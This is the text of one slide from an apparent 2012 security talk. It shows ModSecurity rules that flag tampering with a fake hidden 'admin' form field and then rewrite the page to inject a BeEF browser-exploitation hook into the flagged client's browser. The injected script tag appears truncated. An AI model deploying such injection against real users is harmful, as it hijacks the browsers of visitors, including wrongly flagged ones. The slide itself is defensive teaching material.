Slide 30
Slide 30 text
© 2012
Initiate BeEF Hooking
SecRule ARGS:admin "!@streq false"
"id:'999010',phase:
2,t:none,log,block,msg:'HoneyTrap Alert: Fake
HIDDEN Form Data
Manipulated.',setvar:tx.malicious_client=1"
SecRule TX:MALICIOUS_CLIENT "@eq 1"
"chain,id:'999224',phase:4,t:none,pass,log,
msg:'Hooking Client with BeEF due to
HoneyTrap Violation.'"
SecRule STREAM_OUTPUT_BODY "@rsub s/<\/
html>/<\/script><
\/html>/"